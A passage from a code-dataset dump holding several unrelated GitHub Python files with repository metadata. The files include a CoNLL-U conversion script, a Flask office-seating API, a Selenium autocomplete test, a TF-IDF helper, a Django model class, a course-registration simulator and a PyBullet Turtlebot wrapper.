encoding=\"utf-8\") as f:\n for line in f:\n if line == \"\\n\":\n continue\n line = line.split(\"\\t\")\n try:\n tags.append(line[4])\n heads.append(line[6])\n deps.append(line[7])\n except IndexError:\n raise IndexError(\n f\"Gold file {gold_file} probably isn't written in CoNLL-U format.\"\n )\n lines.append(line[:-1])\n return tags, heads, deps, lines\n\n\ndef read_gold_conllu(gold_file):\n \"\"\"\n Reads in the gold annotation file in CoNLL-U format (all dependencies,\n i.e. multiple dependency relations per token, if applicable).\n\n Returns:\n - unlabelled: a list of sets with head token ID's;\n len(unlabelled) = num_tokens(gold_file)\n - labelled: a list of sets with (head, dependency name) pairs;\n len(labelled) = num_tokens(gold_file)\n \"\"\"\n labelled = []\n unlabelled = []\n with open(gold_file, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n if line == \"\\n\":\n continue\n line = line.split(\"\\t\")\n edges = set()\n edges.add((line[6], line[7]))\n if line[8] != \"_\":\n for edge in literal_eval(line[8]):\n edges.add(edge)\n heads = set([str(h) for h, d in edges])\n labelled.append(edges)\n unlabelled.append(heads)\n return unlabelled, labelled\n\n\ndef read_gold_conll2003(gold_file):\n \"\"\"\n Reads in the gold annotation from a file in CoNLL 2003 format.\n\n Returns:\n - gold: a String list containing one sequence tag per token.\n E.g. [B-Kochschritt, L-Kochschritt, U-Zutat, O]\n - lines: a list list containing the original line split at \"\\t\"\n \"\"\"\n gold = []\n lines = []\n with open(gold_file, encoding=\"utf-8\") as f:\n for line in f:\n if line == \"\\n\":\n continue\n line = line.strip().split(\"\\t\")\n gold.append(line[3])\n lines.append(line)\n return gold, lines\n\n\ndef taggingcolumns2conllu(outfile, tokens, tags, pos_tags=None, filemode=\"w\"):\n \"\"\"\n Takes tokens and tags and writes them into a tsv file in CoNLL-U format.\n Domain-specific tags are required, POS tags are optional.\n CoNLL-U columns: ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC\n\n All tokens are annotated with HEAD = 0 and DEPREL = root, so the parser's\n dataset reader can read in the file without errors.\n \"\"\"\n\n # double-check input\n if len(tokens) != len(tags):\n raise ValueError(\n \"Will not zip tokens and tags: number of tokens in tokens and \"\n \"number of tags in tags must be the same. Got \",\n len(tokens),\n \"and\",\n len(tags),\n )\n # write file: one token per line\n with open(outfile, filemode, encoding=\"utf-8\") as o:\n if pos_tags:\n for (i, (_token, _pos, _tag)) in enumerate(zip(tokens, pos_tags, tags)):\n # need to start counting from 1 bc 0 is used for None-node\n o.write(\n str(i + 1)\n + \"\\t\"\n + _token\n + \"\\t_\\t\"\n + _pos\n + \"\\t\"\n + _tag\n + \"\\t_\\t0\\troot\\t_\\t_\"\n )\n o.write(\"\\n\")\n o.write(\"\\n\")\n else:\n for (i, (_token, _tag)) in enumerate(zip(tokens, tags)):\n # need to start counting from 1 bc 0 is used for None-node\n o.write(\n str(i + 1)\n + \"\\t\"\n + _token\n + \"\\t_\\t_\\t\"\n + _tag\n + \"\\t_\\t0\\troot\\t_\\t_\"\n )\n o.write(\"\\n\")\n o.write(\"\\n\")\n\n\ndef parsercolumns2conllu(outfile, tokens, tags, heads, deps, pos_tags=None):\n \"\"\"\n Takes tokens, tags and dependency relations and writes them into a tsv file in CoNLL-U format.\n Domain-specific tags are required, POS tags are optional.\n\n CoNLL-U columns: ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC\n \"\"\"\n # double-check input\n if len(tokens) != len(tags):\n raise ValueError(\n f\"Will not zip tokens, tags, heads and deps: number of tokens \"\n f\"in tokens and number of tags in tags must be the same. \"\n f\"Got {len(tokens)}, {len(tags)}, {len(heads)} and {len(deps)}.\"\n )\n # write file: one token per line\n with open(outfile, \"w\", encoding=\"utf-8\") as o:\n if pos_tags:\n for (i, (_token, _pos, _tag, _head, _dep)) in enumerate(\n zip(tokens, pos_tags, tags, heads, deps)\n ):\n # need to start counting from 1 bc 0 is used for None-node\n o.write(\n str(i + 1)\n + \"\\t\"\n + _token\n + \"\\t_\\t\"\n + _pos\n + \"\\t\"\n + _tag\n + \"\\t_\\t\"\n + _head\n + \"\\t\"\n + _dep\n + \"\\t_\\t_\"\n )\n o.write(\"\\n\")\n else:\n for (i, (_token, _tag, _head, _dep)) in enumerate(\n zip(tokens, tags, heads, deps)\n ):\n # need to start counting from 1 bc 0 is used for None-node\n o.write(\n str(i + 1)\n + \"\\t\"\n + _token\n + \"\\t_\\t_\\t\"\n + _tag\n + \"\\t_\\t\"\n + _head\n + \"\\t\"\n + _dep\n + \"\\t_\\t_\"\n )\n o.write(\"\\n\")\n\n\ndef execute_analysis(args):\n \"\"\"\n Reads in a gold annotated file and predicted data.\n Writes a new file where the first columns repeat the gold annotated file.\n The last column contains all predictions that do not match the gold annotation.\n If the prediction was correct, the last column in that line stays empty.\n \"\"\"\n\n # Read in prediction for the sequence tagging task\n # and find out whether the predicted items are tags or edges\n pred_tags, model_type = read_prediction_tags(args.pred_file)\n\n if model_type == \"parser\":\n if args.conllu:\n # Print feedback to console\n logging.info(\n \"Comparing edges in \"\n + args.pred_file\n + \"\\nto edges in\"\n + args.gold_file\n + \",\\nwriting results into \"\n + args.out\n )\n\n # Read in gold_file\n gold_tags, gold_heads, gold_deps, goldlines = _read_gold_conllu_simplified(\n args.gold_file\n )\n # Read in prediction for the parsing task\n pred_heads, pred_deps = read_prediction_dependencies(args.pred_file)\n # Combine prediction and expectation into a tsv file\n write_with_misjudgements(\n zip(gold_heads, gold_deps),\n zip(pred_heads, pred_deps),\n goldlines,\n args.out,\n )\n elif args.conll2003:\n raise ValueError(\n f\"The data in {args.pred_file} was predicted by a parser. Can't be \"\n f\"evaluated against a file in CoNLL-2003 format (used flag '-c3' for gold file).\"\n )\n\n elif model_type == \"tagger\":\n # Print feedback to console\n logging.info(\n \"Comparing tags in \"\n + args.pred_file\n + \"\\nto tags in\"\n + args.gold_file\n + \",\\nwriting results into \"\n + args.out\n )\n\n if args.conllu:\n # Read in gold_file in CoNLL-U format\n gold_tags, gold_heads, gold_deps, goldlines = _read_gold_conllu_simplified(\n args.gold_file\n )\n elif args.conll2003:\n # Read in gold file in CoNLL-2003 format (doesn't double-check whether args.gold_file actually\n # is written in CoNLL-2003 format\n gold_tags, goldlines = read_gold_conll2003(args.gold_file)\n # Combine prediction and expectation into a tsv file\n write_with_misjudgements(gold_tags, pred_tags, goldlines, args.out)\n\n\ndef execute_tagger2c(args):\n \"\"\"\n Takes a prediction file generated by our tagger (i.e. json file) and writes a tsv file in CoNLL-U format.\n\n CoNLL-U columns: ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC\n Realised columns (all other columns contain dummy values): ID FORM _ (UPOS) XPOS _ _ _ _ _\n \"\"\"\n if args.sent:\n lineflag = False\n with open(args.pred_file, encoding=\"utf-8\") as f:\n for line in f:\n lineflag = True\n j = json.loads(line)\n tokens = j[\"words\"]\n tags = j[\"tags\"]\n taggingcolumns2conllu(args.out, tokens, tags, filemode=\"a\")\n if not lineflag:\n raise IOError(\n \"Empty file\"\n ) # Due to formatting and other errors in Lin et al. (2020)'s data,\n # some recipes do not contain text, leaving us with empty files.\n # Empty files could cause further errors; therefore, we want to delete them from the dataset.\n else:\n tokens = read_prediction_tokens(args.pred_file)\n tags, _ = read_prediction_tags(args.pred_file)\n taggingcolumns2conllu(args.out, tokens, tags)\n\n\ndef execute_parse2c(args):\n \"\"\"\n Takes a prediction file generated by our parser (i.e. json file) and writes a tsv file in CoNLL-U format.\n\n CoNLL-U columns: ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC\n Realised columns (all other columns contain dummy values): ID FORM _ (UPOS) XPOS _ HEAD DEPREL DEPS _\n \"\"\"\n tokens = read_prediction_tokens(args.pred_file)\n tags, _ = read_prediction_tags(args.pred_file)\n heads, deps = read_prediction_dependencies(args.pred_file)\n parsercolumns2conllu(args.out, tokens, tags, heads, deps)\n\n\nif __name__ == \"__main__\":\n\n # parser for command line arguments\n arg_parser = argparse.ArgumentParser(\n description=\"\"\"Has three modes. \n 1. Analysis mode (default): Takes AllenNLP prediction for sequence \n tags and complementary annotated (gold) file. \n Prints all columns of the annotated file plus an extra column \n for wrongly predicted tokens into a tab separated file.\n 2. tagger prediction2conllu: takes a tagging prediction file (json format) and writes a \n CoNLL-U file with the given columns.\n 3. parser prediction2conllu: takes a parsing prediction file (json format) and writes a \n CoNLL-U file with the given columns.\"\"\"\n )\n arg_parser.add_argument(\n \"-m\",\n \"--mode\",\n dest=\"mode\",\n help=\"\"\"Specify mode as described above. Choose one of the following: {analysis, tagger_p2c, parser_p2c}.\"\"\",\n )\n arg_parser.add_argument(\n \"-p\",\n \"--prediction\",\n metavar=\"PRED_FILE\",\n dest=\"pred_file\",\n required=True,\n help=\"\"\"Prediction file in json format. Output of AllenNLP parser.\"\"\",\n )\n arg_parser.add_argument(\n \"-c3\",\n \"--conll2003\",\n dest=\"conll2003\",\n metavar=\"GOLD_FILE\",\n help=\"\"\"Annotated (gold) file in CoNLL2003 format.\"\"\",\n )\n arg_parser.add_argument(\n \"-cu\",\n \"--conllu\",\n dest=\"conllu\",\n metavar=\"GOLD_FILE\",\n help=\"\"\"Annotated (gold) file in CoNLL-U format.\"\"\",\n )\n arg_parser.add_argument(\n \"-o\",\n \"--output_file\",\n dest=\"out\",\n metavar=\"OUTPUT_FILE\",\n help=\"\"\"Name of the output file. Default: .tsv in evaluation mode\"\"\",\n )\n arg_parser.add_argument(\n \"--single-sentences\",\n dest=\"sent\",\n const=True,\n default=False,\n action=\"store_const\",\n help=\"\"\"Implemented only for mode tagger_p2c.\"\"\",\n )\n args = arg_parser.parse_args()\n\n args.debug = False\n\n # Determine file names in analysis mode\n if args.mode == \"analysis\" or not args.mode:\n if args.out == None:\n args.out = str(args.pred_file)[:-4] + \"tsv\"\n if args.conll2003:\n if args.conllu:\n raise IOError(\n \"Two annotated files provided. Please, specify only one annotated file.\"\n )\n else:\n args.gold_file = args.conll2003\n else:\n if args.conllu:\n args.gold_file = args.conllu\n else:\n raise IOError(\n \"No annotated file provided. Please, specify an annotated file with -c3 or -cu flags.\"\n )\n\n # Determine file names for pred2conllu\n elif args.mode.endswith(\"p2c\"):\n if args.out == None:\n args.out = str(args.pred_file)[:-4] + \"conllu\"\n\n else:\n raise RuntimeError(\n \"Unexpected mode. Please specify one of {analysis, tagger_p2c, parser_p2c}.\"\n )\n\n #########################\n #### Start execution ####\n #########################\n\n if args.mode == \"analysis\" or not args.mode:\n execute_analysis(args)\n elif args.mode == \"tagger_p2c\":\n execute_tagger2c(args)\n elif args.mode == \"parser_p2c\":\n execute_parse2c(args)\n else:\n raise RuntimeError(\n \"Unexpected mode. Please specify one of {analysis, tagger_p2c, parser_p2c}.\"\n )\n","repo_name":"interactive-cookbook/ara","sub_path":"Alignment_Model/preprocessing/read_prediction.py","file_name":"read_prediction.py","file_ext":"py","file_size_in_byte":18259,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"9417777361","text":"from flask import Flask, request, render_template\nfrom flask_cors import CORS\nfrom itertools import chain, combinations, product\nimport pymongo\nfrom pymongo import MongoClient\nimport json\nimport copy\nimport os\nfrom bson import json_util, ObjectId\n# app.config[\"DEBUG\"] = True\napp = Flask(__name__)\n\n# get token from token.txt file so we can auth into mongo server\n# token = open(\"token.txt\", \"r\")\n\n# cluster = MongoClient(token.read())\n# db = cluster[\"Office\"]\n# collection = db[\"company\"]\n\n# token.close()\n\n# app.config[\"DEBUG\"] = True\ncors = CORS(app)\n\n# Returns the powerset of the list (code taken from itertools documentation)\ndef powerset(iterable):\n s = list(iterable)\n return list(chain.from_iterable(combinations(s, r) for r in range(len(s)+1)))\n\n# Given a powerset, returns the sets that contain the team\ndef x(subsets, team):\n temp = subsets[:]\n for subset in subsets:\n if team not in subset:\n temp.remove(subset)\n subsets = temp\n return subsets\n\ndef like_score_calculation(like_score, building):\n count = 0\n for floor in building:\n count += len(floor) * (len(floor) - 1) / 2\n if count == 0:\n return 0\n else:\n return (like_score / count) / 2 \n\n@app.route(\"/tinyoffice/generate\", methods = [\"GET\"])\ndef generate():\n\n # \"floors\": [\n # {\n # \"id\": TK,\n # \"name\": \"TK\",\n # \"capacity\": TK\n # },\n # {\n # ...\n # }\n # ]\n # \"teams\": [\n # {\n # \"id\": TK,\n # \"name\": \"TK\",\n # \"strength\": TK,\n # \"preferred\": [TK],\n # \"noway\": [TK]\n # },\n # {\n # ...\n # }\n # ]\n\n request_data = json.loads(request.args.get(\"params\"))\n request_floors = request_data[\"floors\"]\n request_teams = request_data[\"teams\"]\n\n num_teams = len(request_teams)\n teams = []\n for i in range(num_teams):\n teams.append(list(range(1, num_teams + 1)))\n team_names = {request_teams[i][\"name\"] : i + 1 for i in range(len(teams))}\n team_ids_end = {i + 1 : request_teams[i][\"id\"] for i in range(len(teams))}\n strengths = {i + 1: request_teams[i][\"strength\"] for i in range(len(teams))}\n prefers = {i + 1: [team_names[temp] for temp in request_teams[i][\"preferred\"]] for i in range(len(teams))}\n no_ways = {i + 1: [team_names[temp] for temp in request_teams[i][\"noway\"]] for i in range(len(teams))}\n\n num_floors = len(request_floors)\n floors = {i + 1: request_floors[i][\"capacity\"] for i in range(num_floors)}\n total_space = sum(floors.values())\n\n # print(f\"request_data: {request_data}\")\n # print()\n # print(f\"request_teams: {request_teams}\")\n # print()\n # print(f\"request_floors: {request_floors}\")\n # print()\n # print(f\"num_teams: {num_teams}\")\n # print(f\"teams: {teams}\")\n # print(f\"team names: {team_names}\")\n # print(f\"team ids: {team_ids_end}\")\n # print(f\"strengths: {strengths}\")\n # print(f\"prefers: {prefers}\")\n # print(f\"no_ways: {no_ways}\")\n # print()\n # print(f\"num_floors: {num_floors}\")\n # print(f\"floors: {floors}\")\n # print(f\"total_space: {total_space}\")\n\n #print()\n #print(teams)\n #print()\n for i in range(1, num_teams + 1):\n #print(f\"i: {i}\")\n nos = no_ways[i]\n for no in nos:\n try:\n #print(f\"Removing {no} from team {i}.\")\n teams[i - 1].remove(no)\n #print(teams)\n except:\n continue\n if i in teams[no - 1]:\n #print(f\"Removing {i} from team {no}.\")\n teams[no - 1].remove(i)\n #print(teams)\n\n # floors_final is the list of all possible teams on all floors\n # floors_final[index] is the list of all possible teams on the indexth floor (starting from index = 0)\n # floors_final[index][i] is the list of all possible teams on the indexth floor for the ith team (starting from index = 0, i = 0)\n floors_final = []\n for i in range(num_floors):\n floors_final.append(teams[:])\n subsets = []\n temp_floor = []\n temp_subsets = []\n strength_sum = 0\n #print(floors_final)\n\n for index, floor in enumerate(floors_final):\n for i in range(num_teams):\n temp_floor = floors_final[index][i]\n subsets = x(powerset(temp_floor), i + 1)\n temp_subsets = subsets[:]\n for subset in subsets:\n invalid = False\n strength_sum = 0\n for element in subset:\n strength_sum += strengths[element]\n if element in chain(*[no_ways[temp] for temp in subset]):\n invalid = True\n if invalid == True or strength_sum > floors[index + 1] or strength_sum < floors[index + 1] * 0.25:\n temp_subsets.remove(subset)\n invalid = False\n subsets = temp_subsets\n floors_final[index][i] = subsets\n #print(f\"FLOOR {index}\")\n #for i in range(num_teams):\n #print(f\"Team {i + 1} can be with {floors_final[index][i]}\")\n #print(floors_final)\n\n all_combinations = []\n floor_combinations = []\n #print(floors_final)\n #print(\"ALL POSSIBLE FLOOR COMBINATIONS\")\n for index_floor, floor in enumerate(floors_final):\n #print(f\"------FLOOR {index_floor}------\")\n floor_combinations = []\n for team in floor:\n if team != []:\n for combination in team:\n #print(f\"\\t{combination}\")\n floor_combinations.append(combination)\n all_combinations.append(floor_combinations)\n\n buildings = set(product(*all_combinations))\n\n scores = []\n\n for building in buildings.copy():\n teams_exist = [False] * num_teams\n duplicate = False\n space_score = 0\n like_score = 0\n number_score = 0\n total_score = 0\n for floor in building:\n for team in floor:\n if teams_exist[team - 1] == True:\n buildings.remove(building)\n duplicate = True\n break\n else:\n teams_exist[team - 1] = True\n space_score += strengths[team]\n if team in chain(*[prefers[temp] for temp in floor]):\n like_score += 1\n number_score += 1\n if duplicate == True:\n break\n\n if duplicate == False:\n space_score = space_score / total_space\n number_score = number_score / num_teams\n like_score = like_score_calculation(like_score, building)\n total_score = (space_score ** 2 + number_score ** 2 + like_score ** 2) ** (1/2)\n scores.append(building + (space_score, number_score, like_score, total_score))\n\n scores.sort(key = lambda x: x[-1])\n #print(scores[-1])\n if scores == []:\n return {\"error\": \"No matches found.\"}\n else:\n #print({f\"{request_floors[i]['id']}\": scores[-1][i] for i in range(num_floors)})\n return {f\"{request_floors[i]['id']}\": [team_ids_end[temp] for temp in scores[-1][i]] for i in range(num_floors)}\n\n # ((7,), (2, 3), (1, 11), (4,), (6, 10), 0.9655172413793104, 0.7272727272727273, 1.0, 1.5688050112220524)\n\n# @app.route(\"/tinyoffice/save\", methods = [\"GET\"])\n# def save():\n# request_data = json.loads(request.args.get(\"params\"))\n# request_floors = request_data[\"floors\"]\n# request_teams = request_data[\"teams\"]\n# request_total = {\"floors\": request_floors, \"teams\": request_teams}\n# insertion = db.company.insert_one(request_total)\n# return {\"key\": str(insertion.inserted_id)}\n\n# @app.route(\"/tinyoffice/load\", methods = [\"GET\"])\n# def load():\n# companyID = request.args.get(\"key\")\n# data = db.company.find_one(ObjectId(companyID))\n# return str(data)\n\n\nif __name__ == '__main__':\n from waitress import serve\n serve(app, host=\"localhost\", port=6939)\n \n","repo_name":"TheElliotM/tinyoffice","sub_path":"api/tinyoffice_api.py","file_name":"tinyoffice_api.py","file_ext":"py","file_size_in_byte":8046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41991358579","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\n\nclass AutoComplete():\n\n def test(self):\n baseUrl = \"http://www.southwest.com\"\n driverLocation = \"chromedriver.exe\"\n driver = webdriver.Chrome(driverLocation)\n driver.get(baseUrl)\n driver.maximize_window()\n driver.implicitly_wait(3)\n\n # Send Partial Data\n cityField = driver.find_element_by_id(\"LandingAirBookingSearchForm_originationAirportCode\")\n cityField.clear()\n cityField.send_keys(\"New York\")\n time.sleep(3)\n # Find the item and click\n itemToSelect = driver.find_element_by_xpath(\"//ul[@id='LandingAirBookingSearchForm_originationAirportCode']//li[contains(text(),'NJ - EWR')]\")\n itemToSelect.click()\n\n time.sleep(3)\n driver.quit()\n\nchromeTest = AutoComplete()\nchromeTest.test()","repo_name":"ChrisStreadbeck/Selenium-automation-practice","sub_path":"AutoComplete.py","file_name":"AutoComplete.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6317746041","text":"import pandas as pd\nimport numpy as np\nfrom abc import ABC, abstractmethod\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer, TfidfTransformer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.svm import LinearSVC\nfrom sklearn.calibration import CalibratedClassifierCV\nfrom sklearn.metrics import roc_auc_score\nfrom scipy.sparse import csr_matrix, hstack, vstack\n\n\n\n\ndef tfidf_data_process(train_sentence, test_sentence, word_ngram, word_max, word_min_df=1, word_max_df=1.0,\n char_ngram=(0,0), char_max=100000, char_min_df=1, char_max_df=1.0):\n \"\"\"\n Params:\n train_sentence: pd.Series. Usually the sentence column of a dataframe.\n e.g. train['comment_text]\n test_sentence: pd.Series. Usually the sentence column of a dataframe.\n e.g. test['comment_text]\n \n word_ngram, word_max, word_min_df, word_max_df, char_ngram, char_max, char_min_df, char_max_df: tdidf params\n\n return :x_train: sparse matrix\n y_train: DataFrame (containing all label columns)\n x_test: sparse matrix\n data_id: str, represents params\n \"\"\" \n data_id = 'tfidf_word_{}_{}_{}_{}'.format(word_ngram, word_max, word_min_df, word_max_df)\n \n word_vectorizer = TfidfVectorizer(ngram_range=word_ngram, #1,3\n strip_accents='unicode',\n max_features=word_max,\n min_df = word_min_df,\n max_df = word_max_df,\n analyzer='word',\n stop_words='english',\n sublinear_tf=True,\n token_pattern=r'\\w{1,}')\n print('fitting word')\n word_vectorizer.fit(train_sentence.values)\n print('transforming train word')\n train_word = word_vectorizer.transform(train_sentence.values)\n print('transforming test word')\n test_word = word_vectorizer.transform(test_sentence.values)\n\n y_train = train[label_cols]\n\n if char_ngram == (0,0):\n print('Done')\n return (train_word, y_train, test_word, data_id)\n\n else:\n data_id = '{}_char_{}_{}_{}_{}'.format(data_id, char_ngram, char_max, char_min_df, char_max_df)\n\n char_vectorizer = TfidfVectorizer(ngram_range=char_ngram, #2,5\n strip_accents='unicode',\n max_features=char_max, #200000\n min_df = char_min_df,\n max_df = char_max_df,\n analyzer='char',\n sublinear_tf=True)\n\n print('fitting char')\n char_vectorizer.fit(train_sentence_retain_punctuation.values)\n print('transforming train char')\n train_char = char_vectorizer.transform(train_sentence.values)\n print('transforming test char')\n test_char = char_vectorizer.transform(test_sentence.values)\n\n x_train = hstack((train_char, train_word), format='csr')\n x_test = hstack((test_char, test_word), format='csr')\n\n print('Done')\n return (x_train, y_train, x_test, data_id)\n","repo_name":"wluo-personal/Kaggle","sub_path":"toxic/sc/stacking/tfidf_data.py","file_name":"tfidf_data.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42834603684","text":"import collections\nimport jsonfield\nimport shutil\nimport os.path\n\nfrom django.db import models\nfrom django.utils.crypto import get_random_string\n\nimport analitico\n\nfrom analitico import logger\nfrom analitico.factory import Factory\nfrom analitico.constants import ACTION_TRAIN\nfrom analitico.status import STATUS_RUNNING, STATUS_COMPLETED, STATUS_FAILED\nfrom analitico.exceptions import AnaliticoException\nfrom analitico.utilities import read_json, id_generator\n\nfrom .items import ItemMixin, ItemAssetsMixin\nfrom .workspace import Workspace\nfrom .job import Job\nfrom .notebook import nb_run\n\n##\n## Model - a trained machine learning model (not model in the sense of Django db model)\n##\n\n\ndef generate_model_id():\n return analitico.MODEL_PREFIX + id_generator()\n\n\nclass Model(ItemMixin, ItemAssetsMixin, models.Model):\n \"\"\"\n A trained machine learning model which can be used for inferences.\n The \"training\" attribute of the model includes all the information on\n the training data, parameters, scores and performances. The model can also\n has /data assets like saved CatBoost models, CoreML dumps, etc.\n Trained models are used as immutables in that once created their data\n doesn't change. When you run a new training session you create a new\n model. An endpoint will point to a model to use for predictions. When\n a new model is created, the endpoint is updated to point to the new model.\n \"\"\"\n\n # Unique id has a type prefix + random string\n id = models.SlugField(primary_key=True, default=generate_model_id)\n\n # Model is always owned by one and only one workspace\n workspace = models.ForeignKey(Workspace, on_delete=models.CASCADE)\n\n # Title is text only, does not need to be unique, just descriptive\n title = models.TextField(blank=True)\n\n # Description (markdown supported)\n description = models.TextField(blank=True)\n\n # Time when created\n created_at = models.DateTimeField(auto_now_add=True)\n\n # Time when last updated\n updated_at = models.DateTimeField(auto_now=True)\n\n # Additional attributes are stored as json (used by ItemMixin)\n attributes = jsonfield.JSONField(load_kwargs={\"object_pairs_hook\": collections.OrderedDict}, blank=True, null=True)\n\n # A model's notebook describes the recipe used for training and predictions\n notebook = jsonfield.JSONField(load_kwargs={\"object_pairs_hook\": collections.OrderedDict}, blank=True, null=True)\n\n ##\n ## Jobs\n ##\n\n def run(self, job: Job, factory: Factory, **kwargs):\n \"\"\" Run job actions on the recipe \"\"\"\n\n try:\n if ACTION_TRAIN not in job.action:\n raise AnaliticoException(f\"Model {self.id} does not know job action {job.action}\")\n\n # process action runs recipe and creates a trained model\n job.set_status(STATUS_RUNNING)\n\n notebook = self.get_notebook()\n if notebook:\n # if dataset has a notebook it will be used to process\n nb_run(notebook_item=self, notebook_name=None, factory=factory, upload=True, job=job)\n try:\n training_path = os.path.join(factory.get_artifacts_directory(), \"metadata.json\")\n training = read_json(training_path)\n except:\n logger.warning(\"Model: could not read metadata.json\")\n training = {}\n else:\n # if dataset does not have a notebook we will run its plugins\n plugin_settings = self.get_attribute(\"plugin\")\n if not plugin_settings:\n raise AnaliticoException(\"Recipe: no notebook or plugins to train with\", recipe=self)\n\n plugin = factory.get_plugin(**plugin_settings)\n training = plugin.run(action=job.action)\n\n # upload artifacts to model (not to the recipe!)\n # a recipe has a one to many relation with trained models\n factory.upload_artifacts(self)\n\n if training:\n self.set_attribute(\"training\", training)\n self.save()\n\n job.set_status(STATUS_COMPLETED)\n\n except AnaliticoException as exc:\n job.set_status(STATUS_FAILED)\n raise exc\n\n except Exception as exc:\n job.set_status(STATUS_FAILED)\n raise AnaliticoException(f\"Model: an error occoured while training {self.id}\", item=self) from exc\n\n finally:\n artifacts = factory.get_artifacts_directory()\n shutil.rmtree(artifacts, ignore_errors=True)\n","repo_name":"analitico/analitico","sub_path":"source/api/models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4582,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17473377893","text":"from CourseManager import CourseManager\r\nfrom FileManager import FileManager\r\nfrom RegisterationManager import RegistrationManager\r\nfrom StudentManager import StudentManager\r\n\r\nsemester = \"SPRING\"\r\ncourse_categories = [\"semester1\", \"semester2\", \"semester3\", \"semester4\", \"semester5\", \"semester6\",\r\n \"semester7\", \"semester8\", \"FTE\", \"TE\", \"NTE\"]\r\ncourse_manager = CourseManager()\r\nstudent_manager = StudentManager()\r\n\r\n\r\ndef start_app():\r\n # create courses and schedule them.\r\n course_manager.create_courses(course_categories)\r\n\r\n # write curriculum to file for testing\r\n course_manager.print_schedule()\r\n\r\n # create students and random transcript till now.\r\n student_list = student_manager.create_students()\r\n student_manager.create_transcript(semester, course_manager)\r\n\r\n # write transcript to student's file. BEFORE REGISTRATION\r\n student_manager.print_transcript('BEFORE REGISTRATION', 'w')\r\n\r\n # start to simulate this semester registration.\r\n registration_manager = RegistrationManager(student_list, course_manager)\r\n # select courses randomly for each student to register.\r\n registration_manager.start_registration(semester)\r\n\r\n # registration_manager.print_requested_courses() '''we can write this to file for logging.'''\r\n\r\n # send student selected courses to system and advisor control.\r\n registration_manager.start_to_control()\r\n\r\n # write problems to student's file and analysis file.\r\n problem_records = registration_manager.get_problem_records()\r\n file_manager = FileManager.get_instance()\r\n file_manager.write_analysis_file(problem_records)\r\n file_manager.write_problem_to_student_file(problem_records)\r\n student_manager.print_transcript('AFTER REGISTRATION', 'a')\r\n\r\n\r\nif __name__ == '__main__':\r\n start_app()","repo_name":"turgaytumay/CSE3063F21P1_GRP18","sub_path":"py_iteration/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"40595832349","text":"import importlib.resources as pkg_resources\n\nfrom . import robot\n\n\nclass Turtlebot:\n \"\"\" The turtlebot in the simulated environment \"\"\"\n LEFT_WHEEL = 0\n RIGHT_WHEEL = 1\n\n LIDAR_LINK = 25\n\n def __init__(self, sim, base_position, base_angle=0.):\n \"\"\"The constructor\n\n Parameters\n ----------\n sim : BulletClient\n pybullet simulation client\n base_position : list\n Base position of the robot\n base_angle : float\n base orientation of the robot\n \"\"\"\n self.sim = sim\n self.base_position = base_position\n self.base_orientation = self.sim.getQuaternionFromEuler(\n [0., 0., base_angle]\n )\n\n with pkg_resources.path(robot, 'turtlebot.urdf') as urdf_path:\n self.robot = self.sim.loadURDF(str(urdf_path.resolve()),\n self.base_position,\n self.base_orientation)\n\n def set_velocities(self, left, right):\n \"\"\"Set the velocities on both motors of the robot\n\n Parameters\n ----------\n left : float\n Left wheel velocity\n right : float\n right wheel velocity\n \"\"\"\n self.sim.setJointMotorControlArray(self.robot,\n jointIndices=[self.LEFT_WHEEL,\n self.RIGHT_WHEEL],\n controlMode=self.sim.VELOCITY_CONTROL,\n targetVelocities=[left, right])\n\n def stop(self):\n \"\"\" Stop the robot \"\"\"\n self.set_velocities(0., 0.)\n\n def reset(self, pos=None, angle=None):\n \"\"\"Reset the robot. Stops and sets either to given position and orientation or to the base\n position and base orientation.\n\n Parameters\n ----------\n pos : list\n Optional position to reset to\n angle : float\n Optional angle to reset orientation to\n \"\"\"\n self.stop()\n\n position = pos or self.base_position\n orientation = self.sim.getQuaternionFromEuler([0., 0., angle])\\\n if angle else self.base_orientation\n\n self.sim.resetBasePositionAndOrientation(self.robot,\n position,\n orientation)\n\n def get_pos_and_orientation(self):\n \"\"\"Get the robots current position and orientation\n\n Returns\n -------\n Tuple[float, float, float]\n x, y and rho\n \"\"\"\n pos, orientation = self.sim.getBasePositionAndOrientation(self.robot)\n angle = self.sim.getEulerFromQuaternion(orientation)[2]\n\n return pos[0], pos[1], angle\n\n def get_velocity(self):\n \"\"\"Get the robots velocities\n\n Returns\n -------\n Tuple[float, float, float]\n dx, dy, drho\n \"\"\"\n velocity = self.sim.getBaseVelocity(self.robot)\n\n return velocity[0][0], velocity[0][1], velocity[1][2]\n","repo_name":"dfki-ric-quantum/qdrl-turtlebot-env","sub_path":"qturtle/turtlebot.py","file_name":"turtlebot.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4856032362","text":"from flask import Flask, render_template\nfrom doc2vec import *\nimport sys\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef articles():\n \"\"\"Show a list of article titles\"\"\"\n return render_template('articles.html', article_list = articles)\n\n@app.route(\"/article//\")\ndef article(topic,filename):\n \"\"\"\n Show an article with relative path filename. Assumes the BBC structure of\n topic/filename.txt so our URLs follow that.\n \"\"\"\n articlename = '/%s/%s' %(topic, filename)\n for a in articles:\n if 